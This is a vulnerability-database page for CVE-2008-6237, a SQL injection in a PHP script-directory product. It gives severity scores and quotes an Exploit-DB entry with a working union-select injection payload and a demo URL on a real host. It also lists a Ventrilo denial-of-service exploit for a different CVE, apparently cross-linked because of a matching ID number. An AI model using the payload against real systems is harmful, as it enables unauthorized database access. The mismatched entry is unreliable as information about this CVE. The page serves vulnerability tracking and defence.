CVE-2008-6237
published 2009-02-23CVE-2008-6237: SQL injection vulnerability in software-description.php in Scripts For Sites (SFS) Hotscripts-like Site allows remote attackers to execute arbitrary SQL…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.00%
58.4th percentile
SQL injection vulnerability in software-description.php in Scripts For Sites (SFS) Hotscripts-like Site allows remote attackers to execute arbitrary SQL commands via the id parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SFS EZ Software - 'id' SQL Injection
exploitdb·2008-10-31
CVE-2008-6237 SFS EZ Software - 'id' SQL Injection
SFS EZ Software - 'id' SQL Injection
---
Application : SFS EZ Software
Risk : High
FOund By: x0r
Exploit: software/software-description.php?id=-5 union all select
1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
Live Demo:
http://www.turnkeyzone.com/demos/software/software-description.php?id=-5%20union%20all%20select%201,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
-=EOF=-
# milw0rm.com [2008-10-31]
Exploit-DB
Ventrilo 3.0.2 - Null Pointer Remote Denial of Service
exploitdb·2008-08-13
CVE-2008-3680 Ventrilo 3.0.2 - Null Pointer Remote Denial of Service
Ventrilo 3.0.2 - Null Pointer Remote Denial of Service
---
NULL pointer in Ventrilo 3.0.2
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6237.zip (2008-ventrilobotomy.zip)
# milw0rm.com [2008-08-13]
No writeups or analysis indexed.
2009-02-23
Published